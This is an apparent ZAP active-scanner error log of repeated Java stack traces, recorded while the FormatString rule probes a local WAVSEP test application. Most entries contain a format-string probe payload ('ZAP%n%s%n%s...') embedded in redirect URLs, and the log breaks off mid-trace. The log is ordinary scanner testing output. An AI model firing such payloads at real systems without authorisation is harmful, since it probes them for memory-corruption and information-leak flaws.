org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5565921 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5565922 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566124 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566124 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566321 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5566324 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566522 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5566522 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5566724 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5566727 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566928 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5566929 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5567128 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 